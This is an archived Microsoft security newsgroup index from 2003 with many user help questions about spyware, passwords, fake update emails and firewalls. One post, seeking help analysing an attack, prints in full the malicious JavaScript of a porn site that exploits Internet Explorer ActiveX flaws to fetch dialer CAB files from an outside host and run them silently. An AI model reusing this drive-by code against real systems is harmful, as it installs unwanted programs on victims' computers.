DNS Security

TheMSsForum.com: The Microsoft Software Forum

The MSS Forum ‹ Security
- Archive
  - Biz
  - MCSE
  - CRM
  - Drivers
  - Framework
  - ADO
  - ASP
  - Compact
  - Forms
  - Dotnet
  - C#
  - VB
  - FontpageGen
  - Excel
  - WorkSheet
  - Exchange
  - Setup
  - Fox
  - Fontpage
  - ASP
  - IIS
  - Entourage
  - Money
  - Messanger
  - PocketPC
  - Powerpoint
  - Project
  - Publisher
  - Excel
  - VB
  - Security
  - Portal
  - Services
  - SQLServerDev
  - SVCS
  - SQLServer
  - VB
  - VC
  - MFC
  - ExcelGen

- Previous
  - 1
    - Unwanted Favorites Sites A persistent program (which neither AdAware nor SpyBot has been able to detect or remove) keeps adding the same few sites to my Favorites every once in a while. Shortcuts matching these sites also sometimes turn up in c: (no directory) or in C:\WINDOWS\system32\config\systemprofile\Favorites I've run HijackThis, but I'm not enough of an expert to tell what is or isn't spyware. Any tips? Here's the HijackThis log (all the Trusted Zones are mine): Logfile of HijackThis v1.97.7 Scan saved at 5:07:08 PM, on 12/18/2003 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\System32\atiptaxx.exe C:\Program Files\Compaq\EAB\EabServr.exe C:\Program Files\BroadJump\Client Foundation\CFD.exe C:\Program Files\iTunes\iTunesHelper.exe C:\Program Files\QuickTime\qttask.exe C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe C:\PROGRA~1\mcafee.com\agent\mcagent.exe C:\PROGRA~1\ZONELA~1\ZONEAL~1\zlclient.exe c:\progra~1\mcafee.com\vso\mcvsescn.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\WINDOWS\System32\GEARSEC.EXE c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\Program Files\iPod\bin\iPodService.exe c:\PROGRA~1\mcafee.com\vso\mcshield.exe C:\WINDOWS\explorer.exe C:\PROGRA~1\MICROS~3\Office\OUTLOOK.EXE C:\Program Files\Outlook Express\msimn.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Documents and Settings\Craig T\Desktop\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://login.mail.lycos.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://rd.yahoo.com/customize/yessentials_cq/defaults/sb/*http://www.yahoo.com/search/ie.html R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer provided by Compaq R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://store.presario.net/scripts/redirectors/presario/storeredir2.dll?s=consumerfav&c=1c02&lc=0409 R3 - URLSearchHook: (no name) - {6CC1C918-AE8B-4373-A5B4-28BA1851E39A} - (no file) O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SafeGuard Popup Blocker - {B824E7B0-E8E3-4D75-895E-2C309EA4CC5D} - C:\Program Files\SafeGuard Popup Blocker Pro\SGPopupBlocker.dll O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe O4 - HKLM\..\Run: [AtiPTA] atiptaxx.exe O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe O4 - HKLM\..\Run: [eabconfg.cpl] C:\Program Files\Compaq\EAB\EabServr.exe /Start O4 - HKLM\..\Run: [srmclean] C:\Cpqs\Scom\srmclean.exe O4 - HKLM\..\Run: [TkBellExe] C:\Program Files\Common Files\Real\Update_OB\evntsvc.exe -osboot O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Program Files\Microsoft Works\WksSb.exe /AllUsers O4 - HKLM\..\Run: [Cpqset] c:\compaq\cpqsetup\cpqset.exe O4 - HKLM\..\Run: [BJCFD] C:\Program Files\BroadJump\Client Foundation\CFD.exe O4 - HKLM\..\Run: [iTunesHelper] C:\Program Files\iTunes\iTunesHelper.exe O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime O4 - HKLM\..\Run: [VSOCheckTask] "c:\PROGRA~1\mcafee.com\vso\mcmnhdlr.exe" /checktask O4 - HKLM\..\Run: [VirusScan Online] "c:\PROGRA~1\mcafee.com\vso\mcvsshld.exe" O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe O4 - HKLM\..\Run: [MCUpdateExe] c:\PROGRA~1\mcafee.com\agent\mcupdate.exe O4 - HKLM\..\Run: [Zone Labs Client] C:\PROGRA~1\ZONELA~1\ZONEAL~1\zlclient.exe O4 - HKCU\..\Run: [MoneyAgent] "c:\Program Files\Microsoft Money\System\Money Express.exe" O4 - HKCU\..\Run: [cnet] "C:\Program Files\Kontiki\bin\kontiki.exe" -s cnet -q O4 - HKCU\..\Run: [SpyKiller] C:\Program Files\SpyKiller\spykiller.exe /startup O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ? O9 - Extra button: Real.com (HKLM) O9 - Extra 'Tools' menuitem: Popup Blocker Options (HKLM) O9 - Extra button: MoneySide (HKLM) O9 - Extra button: Messenger (HKLM) O9 - Extra 'Tools' menuitem: Messenger (HKLM) O9 - Extra button: Advisor (HKCU) O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll O14 - IERESET.INF: START_PAGE_URL=http://store.presario.net/scripts/redirectors/presario/storer edir2.dll?s=consumerfav&c=1c02&lc=0409 O15 - Trusted Zone: http://polls.cnn.com O15 - Trusted Zone: http://www.cnn.com O15 - Trusted Zone: http://www.cruisecritic.com O15 - Trusted Zone: http://espn.go.com O15 - Trusted Zone: http://sports.espn.go.com O15 - Trusted Zone: http://lw9fd.law9.hotmail.msn.com O15 - Trusted Zone: http://loginnet.passport.com O15 - Trusted Zone: http://login.passport.net O15 - Trusted Zone: http://www.telus.com O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://bin.mcafee.com/molbin/shared/mcinsctl/en-us/4,0,0,76/mcinsctl.cab O16 - DPF: {90C9629E-CD32-11D3-BBFB-00105A1F0D68} (InstallShield International Setup Player) - http://www.installengine.com/engine/isetup.cab O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/vso/en-us/tools/mcfscan/1,5,0,4307/mcfscan.cab O16 - DPF: {F58E1CEF-A068-4C15-BA5E-587CAF3EE8C6} (MSN Chat Control 4.5) - http://fdl.msn.com/public/chat/msnchat45.cab Tag: DNS Security Tag: 42160
  - 2
    - WEB Attacks I am setting up ISA server for our local network. If I, only, allowed outgoing request, should I be concerned that someone could steal files or packets of data that travel internally or somebody could destroy the installation? If it is the later, then I would mind a lot less. If it means that somebody could steal the data, would DMZ setup resolve this problem? I guess the question is: eventhough it is possible, is it being done today? If it is being done today, is there a solution? Thanks in advance Tag: DNS Security Tag: 42155
  - 3
    - Spy ware I think I have spyware on my computer, I have XP. What can I do to detect and delete it? Thanks! Tag: DNS Security Tag: 42151
  - 4
    - Password Protection for Notepad We frequently need to use Notepad to store sensitive data for sending to others. We use Notepad as it leaves the data in its original format whereas WORD imposes formatting. I don't see how to password protect the Notepad file. We use encryption but would also like to use a password. If I can't password protect Notepad files can you refer me to another product that is generic like Notepad (no special formatting goin on) that I can password protect? Tag: DNS Security Tag: 42149
  - 5
    - Converting to AD Can someone tell me where to find information to back my opinion. My company is converting from Windows NT 4.0 to Windows 2000 and Active Directory. I am telling them that the Data Security Unit needs to play a key role in this convertion. Can anyone help??? Tag: DNS Security Tag: 42147
  - 6
    - windows update stops I am able to load the Windows update website; I ask the site to scan my computer so the current setup can be checked...scan reaches 66% then update site freezes; can't find exact reference to my problem in Microsoft Knowledge Base. Tag: DNS Security Tag: 42146
  - 7
    - internet eMail security breach message I received an unsolicited eMail from: ebnkdq@bulletin.com with title: Newest Internet Critical Update that looks like a web page from Microsoft. It says to install attached security patch to outlook, outlook express & Internet explorer. The attahced file is named: resultado_escaneo_Q313372.exe.txt I believe this to be a trojan. Please pass onto Microsoft for verification & security alert, if neeeded. John Tag: DNS Security Tag: 42144
  - 8
    - Cleaning a Hard Drive I just recieved a new computer and I would like to donate my old computer. Before I donate my old computer I would like to make sure there is no personnal information left on the hard drive. I have heard that I should format my old hard drive then there are programs to be ran which will over-wright the old information which still exist on the hard drive just marked as deleted. I hope that makes some sense. Can anyone tell me if I'm on the right track to do what I want to do and what the name of these type of programs are? Tag: DNS Security Tag: 42140
  - 9
    - Installing backup exec (8.6.3308) after hardening w2k / IIS / MSSQL Server After following both microsofts advice and those that can be found in the O'Reilly book "Securing Windows NT/2000 Servers for the Internet", I found out that the server went into production without running backup exec, we are currently running the backup that follows with 2k, but I would much preffer the added functionality of BE. The problem is that so far, I have failed to install the software, I get all manners of different errors(or none at all, the installation just never starts) Long story short, I have a production box running without sufficient backup, for a smooth restore. I realize that I might be too late, to salvage this box, but hoped the expertise here might be able to help me. I might be missing the obvious as I have little experience in running w2k(or any windows box) as a webserver. When I try to run the installation from the cd, it fails without any error, just never starts. If I try to run the specific setup.exe from the cd(or a copied over version), it tells me it is not a valid w32 application. If I try from remove / add programs, it tells me: "Access to the specified device, path or file was denied" When I click ok to that, I get: "Windows could not run the installation program. You may be out of memory. Close some files or programs, and try again" Which I expect is just windows way of telling me it doesn't really know what goes wrong ;o) running the setup from command line(silent setup), doesn't even create the appropiate log file, which kinda strengthens my idea that it never initiated the install procedure... Any ideas/suggestions/help would be much appreciated Sincerely Dan A Tag: DNS Security Tag: 42133
  - 10
    - Event ID 534 Has anyone seen this event on an XP station. I have seen it before but it would always have a username, domain, and workstation name... not sure how to trace it without any of the above. Thank you! Logon Failure: Reason: The user has not been granted the requested logon type at this machine User Name: Domain: Logon Type: 3 Logon Process: Kerberos Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Workstation Name: - Tag: DNS Security Tag: 42131
  - 11
    - SUS Server + Exchange 2003 on Windows 2003 Too many services have too many issues on the same box. When I installed SUS on my homegrown, everything was alright for about 2-3 months. Then, all of a sudden, after a while, the webadministration for SUS dies. However, I can still tell that the service still works. For example. SUS is configured to automatically deploy fixes that were previously approved. Not being able to approve new fixes, a month or so ago, I recovered new fixes from the SUS server. WTF. How can I get the web interface back. I've tried uninstalling and reinstalling the services. I think there is something wrong with the ACL on the directory to where it installs and haven't been able to figure it out for the life of me. Help the Securely Waning, Christopher Beasley Tag: DNS Security Tag: 42129
  - 12
    - virus? my dial-up connection pop up spontanously and begines to dial up every one minutes what is the problem thanks Tag: DNS Security Tag: 42128
  - 13
    - ** READ THIS BEFORE POSTING - answers to frequently asked questions 2003.12.18 Before you post a question to a Microsoft.public.*.security newsgroup, note that your question may already be answered below: Answers to Top Frequently Asked Questions: http://securityadmin.info My question is not mentioned below. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette I just heard about a new Microsoft security patch update. Where can I get the patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I just installed a Microsoft security patch update, and now my computer is having problems. http://securityadmin.info/faq.htm#patchbroke I received an email from Microsoft / Microsoft Support / Microsoft Internet Security Center claiming to be a security patch [or comprehensive Internet Explorer update]. Is this a virus? http://securityadmin.info/faq.htm#microsoftemail ALSO NOTE: www.grisoft.com is free antivirus, USE IT. I received a virus email from a Microsoft email address. Who do I report this to? http://securityadmin.info/faq.htm#microsoftemail I have the RPC Blaster worm "virus," what do I do? http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. My computer is giving RPC Remote Procedure Call messages. There is a TFTP message or file on my computer. My computer keeps locking up, and/or rebooting, or telling me that it will reboot in 1 minute. http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. Where can I download the Blaster worm / RPC DCOM patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I'm having a problem caused by the JDBGMGR.EXE Teddy Bear "virus" hoax, or I want to replace this file. http://securityadmin.info/faq.htm#jdbgmgr I forgot my Windows logon password and can't log in. How do I reset it? http://securityadmin.info/faq.htm#password I have a problem or a question with a virus or with antivirus. http://securityadmin.info/faq.htm#virus NOTE: www.grisoft.com is free antivirus, USE IT. Why is Outlook Express blocking my attachments as "unsafe"? http://securityadmin.info/faq.htm#attachments How do I stop getting pop-up messages? Or adware? Or spyware? http://securityadmin.info/faq.htm#pop-ups How do I block people from viewing adult or objectionable content on a computer? http://securityadmin.info/faq.htm#contentfilter How do I block spam emails? http://securityadmin.info/faq.htm#spam There is a Content Advisor password blocking me from certain web sites. http://securityadmin.info/faq.htm#contentadvisor How do I delete an FTP folder that a hacker put on my computer and I cannot delete? http://securityadmin.info/faq.htm#ftpfolder Have I been hacked? What do I do if I've been hacked? http://securityadmin.info/faq.htm#hacked How do I re-secure a computer that has been hacked? http://securityadmin.info/faq.htm#re-secure How do I test or improve the security on my computer to avoid being hacked? http://securityadmin.info/faq.htm#harden How do I investigate a suspicious IP address that may be trying to hack me? http://securityadmin.info/faq.htm#trace How do I report a hacker? http://securityadmin.info/faq.htm#reporthacker How do I use a port scanner or vulnerability scanner to test my security? http://securityadmin.info/faq.htm#portscanner How do I encrypt my files and/or hard drive? http://securityadmin.info/faq.htm#encryption How do I get a firewall? IDS? http://securityadmin.info/faq.htm#firewall I want to use the IPSec filtering or IP filtering feature of Windows to block certain ports and have a problem or question. http://securityadmin.info/faq.htm#ipsec I have a problem or question with the XP ICF firewall. http://securityadmin.info/faq.htm#icf I have a problem or question with the IIS URLScan tool. http://securityadmin.info/faq.htm#urlscan How do I change the banner on my computer or server to hide what software version I'm using? http://securityadmin.info/faq.htm#banner How do I enable Windows Auditing to tell who logged into Windows or who accessed a file? http://securityadmin.info/faq.htm#auditing How do I inspect and disable programs that start up when Windows starts? http://securityadmin.info/faq.htm#startup How do I use RUNAS or let someone use RUNAS to run commands as administrator without having to type the password? http://securityadmin.info/faq.htm#runas How do I let non-administrator users run Defrag or change their IP address? http://securityadmin.info/faq.htm#runas My question is not mentioned above. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette Note that this is NOT a full list of all the questions answered in the FAQ. Chances are, your question has probably already been answered. The complete FAQ is at: http://securityadmin.info/faq.htm#contents I hope this is helpful. Feedback, suggestions and criticism regarding the FAQ are welcome and may be emailed to me. kind regards, Karl Levinson, CISSP, MCSE, MVP email: levinson_k@despammed.com Tag: DNS Security Tag: 42126
  - 14
    - Exchange 5.5 Security Hi We run exchange 5.5 and I am interested in the NTFS security on these directoires that are shared on our exchange server: Add-ins Address Resources Tracking.log Firstly what are these directories used for and secondly the NTFS permissions on these shares are all Everone Full control. What could we set these permissions to make them more restrictive but without stopping exchange from functioning? Thanks in advance. Tag: DNS Security Tag: 42124
  - 15
    - print post to file When you print a post to file instead of to the printer, what do you use to read it? Tag: DNS Security Tag: 42119
  - 16
    - Password How do I reset my Outlook Express password if I don't know what my current password is? Tag: DNS Security Tag: 42116
  - 17
    - 3DES encryption and unable to browse https sites! I chose to take advantage of the best encryption offered by XP Pro by enabling 3DES encryption. Nasty side effect: whenever I try to access a secure website, I receive "The page cannot be displayed". As soon as I disable 3DES, accessing secure websites works fine. Anybody have any input on this (other than "why use 3DES" or "don't use 3DES!) Thanks- Samir Tag: DNS Security Tag: 42113
  - 18
    - mslaugh.exe , system ..... Can anyone explain me what this application is used for and what does it do? mslaugh.exe - it is transmiting some data or just opens a port all the time. the port is 135. The remote adress is 66.11.143.*** Then a process name "system" transmits Remote Procedure Call (TCP) through random ports, but to an ip: 81.36.**.*** Then "NetBIOS" (UDP) transmits something called NetBIOS Traffic through random ports also. Then what is ICMP Traffic for Echo Request? Thanks Tag: DNS Security Tag: 42108
  - 19
    - Under a rock Thanks for you "witty" reply.... NO... I haven't been under a rock... I KNOW this is OLD news. I wanted to advise everyone that it is STILL going on in increasing numbers. Have a nice day :-) Tag: DNS Security Tag: 42103
  - 20
    - Viewing .jpg - Download Warning Up until yesterday, no problem viewing jpg's or mpg's. After using Photosuite to print some digital pix, when I click on jpg now, I get a warning about downloading files but then can click open. But the checkbox to always allow is grayed out. Suggestions? Tag: DNS Security Tag: 42102
  - 21
    - Fake Microsoft Update Email Boy, talk about guts! After posting a question on the Newsgroup for PowerPoint on Monday and posting my email address to boot, I was bombarded with four Emails (and maybe even seven) that all had the "LOOK" of an official Microsoft Email / Website. They all told me that the attachment in the Email was the latest patch / update / fix to whatever (Outlook, Explorer, Windows, etc.). Fortunately, my ISP's virus software caught the W32.Swen.A@mm worm in each attachment sent, before my virus software even had a chance to get it. So, look out everyone - tis the season to wreak havoc among us all. And they are checking the newsgroup postings to find their victims. Dave D Tag: DNS Security Tag: 42100
  - 22
    - Turn off WindowsXP firewall? When I open the Control Panel, Internet Connections, right click on the connection and select Properties, nothing happens. Also tried selecting the conection and then in the left pane click on "Change Settings" and still nothing happens. David Tag: DNS Security Tag: 42094
  - 23
    - content advisor i forgot my password for content advisor and dont know how to retrieve it. please advise Tag: DNS Security Tag: 42089
  - 24
    - When will December's updates be released????? Anybody have any clue as to when MS will release the December patch updates? I know IE has a serious exploit with no patch. I have a room full of servers that are curious. Thanks Ron Tag: DNS Security Tag: 42085
  - 25
    - unable to access secure sites Why can't I access them, it was fine a few days ago and now I can't check me email(hotmail) and can't buy anything. Can anyone help???? Tag: DNS Security Tag: 42084
- Next
  - 1
    - i wanna know my password???????? my e-mail is::::::::: slipknot_20f@hotmail.com ..this is my email where i have serious troubles to sign=20 in.. please my secret question has been changed..so i can=B4t=20 enter to my msn please if you can give me the secret=20 question=B4s answer will be so cool.please there i have=20 many contacts that are very important to me..please if=20 you find out the answer send me it to=20 eminem_21f@hotmail.com this is my other email.please ..i=20 hope you can help me luis felipe medina corac... lima_peru Tag: DNS Security Tag: 42079
  - 2
    - N in black box on internet address bar I just recently noticed when I open my home page that a "N" in a black box appears before the http://. Once I go to another site it usually disappears and is replaced by the normal interent explorer"e". Does anyone know what this "N" is and how do I get rid of it? I use Road Runner as an internet provider but they say it has nothing to do with them. Tag: DNS Security Tag: 42076
  - 3
    - Virus? Dirk, Thanks for the info......but like I said, I regulary use sybot. Any other ideas? Jim Tag: DNS Security Tag: 42071
  - 4
    - Event Log On Security Log, Windows 2000NT Professional, what is event #521. Tag: DNS Security Tag: 42070
  - 5
    - help i have forgot my password to outlook exs can anyone tell me what i can do i am on win98. thanks. Tag: DNS Security Tag: 42068
  - 6
    - Weird start up probs Hi all, When I boot up my laptop (WinXP Home), all most immediately my dial up connection starts up. I have checked all of the dialup connections & they appear to be ok - oh I have compared these settings to a desktop I use (again WinXP Home). Thats the first problem. Now the second problem in my opinion is possibly tied in with the first. When my laptop has successfully logged on I get a toolbar appear & if I click on HOME it takes me to a site www.active-max.com. I must admit it doesnt really bother me to much however reading your groups this might be quite serious & therefore I would like to take some action. I regular use Sybot search & destroy, I use black ice defender as my firewall & use Nortons anti virus. Also I regulary do my microsoft updates. I have also checked in my add & remove programs to ensure there have not been any dodgy software loaded - there is not. Any advice would be greatly appreciated Thank in advance Jim Tag: DNS Security Tag: 42065
  - 7
    - internet call waiting I need to know which security update blocks port 7700. i am told by bell south internet call waiting service that this prevents icw form working properly. Tag: DNS Security Tag: 42064
  - 8
    - SUS srv problems We have a few Win XP sp1 clients that are hanging during the "applying software policy" portion of the bootup. We apply the WUAU22.msi package via group policy and also change the windows update properties via group policy, so that clients get updates from our local SUS server. I understand that SP1 installed the windows update service, so shouldn't the machines just go past the wuau22.msi package install since they already have the software? Any help would be appreciated. Tag: DNS Security Tag: 42063
  - 9
    - ? different type of format? Data recovery folks say they can recover all data not over written on your hd. Is there a program that will over write all sectors/clusters etc. on a hd so that this is not possible and if so who are they? most thankfull Tag: DNS Security Tag: 42058
  - 10
    - data security Data recovery folks say they can recover all data not over written on your hd. Is there a program that will over write all sectors/clusters etc. on a hd so that this is not possible and if so who are they? most thankfull. Tag: DNS Security Tag: 42056
  - 11
    - search history on the microsoft internet explorer,immediately below the address bar,is a search bar. Can anyone tell me how to clear the search history from this bar? Thanks I.L. Tag: DNS Security Tag: 42054
  - 12
    - How to block specified IP in windows 2000 ? HEllo ! How to block specified IP in windows 2000 ? (f.e. 10.1.1.200 ) Tag: DNS Security Tag: 42053
  - 13
    - password on opening I would like to set up a password upon opening my computer. I didn't do this when I first got the computer. Can anyone tell me how to go about doing this? I"m working with windows 98 SE. Thank you in advance for your assistance. Tag: DNS Security Tag: 42037
  - 14
    - Xp firewall log Hi, How can i view the log file of the ICS firewall built in XP professional or home edition. I have XP professional and the firewall is turned on and i don't know how to view it's log file. Any reply will be appreciated Thanks Amanda Tag: DNS Security Tag: 42033
  - 15
    - outlook express spam i have email coming into my outlook express which i would rather not have, i have sent a message back to the company who sent the message saying that they are spamming me and i have blocked there email but i dont want to just block it because when its blocked it just sent to my email bin, what i want to do is to stop it been received by my email in the first place. is there anyway i can do this or is there a way i can only let people on my address book send me mail and thats all ??? any help you can give would be great as i have small kids who use the computer and i dont want them seening some of the crap that is been sent. Tag: DNS Security Tag: 42029
  - 16
    - Identify these IE exploits? Hi everyone, I'm trying to help some people who have been the victims of a pretty suspicious porn website that installs dialler programs and stuff on their visitors' computers. The problem is, I know zero about javascript, and am fairly clueless when it comes to IE exploits too, which they seem to use pretty heavily in this case. I think I have the general idea about what happens when people open these webpages (CAB-files get downloaded and executed/installed) but it would be really great if anyone could help me identify in more detail what the javascript code does and what exploits are being used. I'll include three files below. Thanks in advance for any help I can get. Regards, /Ragnar (you can mail user "ragnar" at the domain gatorhole dot se) *** Dump of the HTL file that gets loaded first *** HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Connection: close Date: Fri, 12 Dec 2003 22:10:06 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 29 Oct 2003 13:15:26 GMT ETag: "bc1ea0b71e9ec31:a64" Content-Length: 1130 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <script> function SetCookie (name,value,expires,path,domain) { document.cookie = name + "=" + escape (value) + ((expires) ? "; expires=" + expires.toGMTString() : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") ; } var expdate = new Date (); expdate.setTime (expdate.getTime() + 60 * 60 * 1000); SetCookie("infoexec1.0_filename", "^smsdial752.exe^dating762.exe^connecting19.exe^", expdate, "/"); </script> <head> <title>Connecting</title> </head> <body bgcolor="#FFFF00" text="#000000"> <table width="300" border="0" align="center" bordercolor="#000000"> <tr> <td> <div align="center"><font size="4"><b>Ansluter till HÅRDPORR......</b></font></div> </td> </tr> </table> <div align="center"><br> <br> <a href="connecting19.htm"><font face="Arial, Helvetica, sans-serif" size="4"><b>SLÄPP IN MIG</b></font></a><br> <br> <br> <br> <br> <br> <br> <bR> <script src=i.js></script> </div> </body> </html> *** Dump of the javascript i.js *** HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Connection: close Date: Fri, 12 Dec 2003 22:13:51 GMT Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Mon, 08 Dec 2003 17:23:47 GMT ETag: "6e6b1bab0bdc31:a64" Content-Length: 2828 cabfile="http://www.sexfiles.nu/newdial/info_sex2.cab"; document.write('<div style="position: absolute; visibility: hidden;"><iframe id=if1></iframe></div>') ; isopen=false; openinsearch=false; usecache=false; function generic() { document.write("<OBJECT CLASSID=clsid:bd11a280-2e73-11cf-b6cf-00aa00a74dae "+ "CODEBASE=http://www.sexfiles.nu/newdial/Info_sex.cab ID=i></OBJECT>"); } function dl_o_inca(){ try{ var f2=new ActiveXObject("Microsoft.XMLHTTP");f2.Open("GET","/scripts/o_inca.htm", false); f2 .Send(); } catch(ex) {} } function s1(){ try{ x=GetObject("C:/WINDOWS/Tempor~1/Content.IE5/INDEX.DAT","htmlfile"); dl_o_inca(); var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile, false); f0.Send(); setTimeout("s2();",200); } catch(ex){ openinsearch=true; } try{ var s=new ActiveXObject("ADODB.Stream"); } catch(ex){ usecache=true; } if (openinsearch){ __bb=open("http:///","_search"); isopen=true; if (usecache){ setTimeout("__so3()", 500); } else { setTimeout("__so2()", 500); } onunload=closes; setTimeout("closes()", 5000); } } function __so2() { try{ open('file:javascript:eval(\'s=new ActiveXObject(\"ADODB.Stream\");s.Mode=3;s.Type=1;try{s.Open() ;x=new ActiveXObject(\"Microsoft.XMLHTTP\");x.Open(\"GET\",\"'+cabfile.replace(/[/]/g,"%2f")+'\",0);x .Send();s.Write(x.responseBody);s.SaveToFile(\"C:%2fInfo_sex2.cab\",2);s.close();}catch(ex){};try{s.o pen();x.Open(\"GET\",\"http:%2f%2fwww.sexfiles.nu%2fnewdial%2fI-iframe.HTM\",0);x.Send();s.Write(x.re sponseBody);s.SaveToFile(\"C:%2fI.HTM\",2);s.close();}catch(ex){};;document.location=\"C:%2fI.HTM\"\' )',"_search"); } catch(ex) { closes(); generic(); } } function __so3() { try{ dl_o_inca(); var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile, false); f0.Send(); open('file:javascript:var z_;var a="";var ab="%2fo_inca[1].htm%3f";var xxy=GetObject("C:%2fWINDOW S%2fTempor~1%2fContent.IE5%2fINDEX.DAT","htmlfile");var x=setTimeout("var aa=xxy.body.innerText.subst r(30,80).match(%2f[A-Z0-9]{8}%2fg);for(i=0;i<4;i++){ab+=\\"~\\"+aa[i]};for(i=0;i<4;i++){a+=\\"<iframe src=C:%2fWINDOWS%2fTempor~1%2fContent.IE5%2f\\"+aa[i]+ab+\\"><%2fiframe>\\"};document.write(a)",1000 );var z__;',"_search"); } catch(ex) { closes(); generic(); } } function closes(){ if (isopen==true) { isopen=false; try{__bb.close()}catch(ex){} } } function s2(){ try{ aa=x.body.innerText.substr(30,80).match(/[A-Z0-9]{8}/g); a="";for (i=0;i<4;i++) a+="<iframe src=C:/WINDOWS/Tempor~1/Content.IE5/"+aa[i]+"/o_inca[1].htm?"+aa[0]+"~"+aa[1]+"~"+a a[2]+"~"+aa[3]+"></iframe>"; if1.document.write(a); } catch(ex) { setTimeout("s2();",200); } } onload=s1; onerror=generic; *** Dump of the o_inca.htm file *** HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Connection: close Date: Fri, 12 Dec 2003 22:20:42 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 03 Dec 2003 16:08:56 GMT ETag: "fa63e1c0b7b9c31:a64" Content-Length: 252 <script> a=document.location.href.substring(document.location.href.length-35).split('~'); for (i in a) document.write('<OBJECT CLASSID=clsid:11111111-1111-1111-1111-11111111111'+i+' CODEBASE="../'+a[i]+ '/info_sex2[1].cab"></OBJECT>'); </script> Tag: DNS Security Tag: 42028
  - 17
    - Command Prompt of Firewall Folks: Is there a way to programatically (via DOS) switch on/off the Firewall built into Windows XP ? I have a copy of McAfee Firewall - Personal Edition - installed on my home PC. I just wondering if this program allows itself to be controlled (turned on/off & configured) programmatically ? If so, how can I programmatically (using DOS) turn on/off my Mcafee Firewall and do some other basic configurations from the DOS PROMPT or from a batch file. Thanks, John. Tag: DNS Security Tag: 42021
  - 18
    - Virus? Started having strange sound bytes like whistles,voices,snippets of songs, ran a virus scan and had several files infected with sbworm,but they were cleaned or deleted. The sounds remain- don't know if they were connected but I'm manually scanning file and haven't found anything yet. Anyone heard of a virus that leaves behind annoying sound bytes constantly. Its preventing from using the video editing features because of the sounds ending up on the audio tracks. Also, in case someone is not aware if you receive an e-mail from Insta-kiss(or something similar) don't open , an employee's online identiy info including passwords were lifted , and I recently received an email from that sender but deleted it. Tag: DNS Security Tag: 42019
  - 19
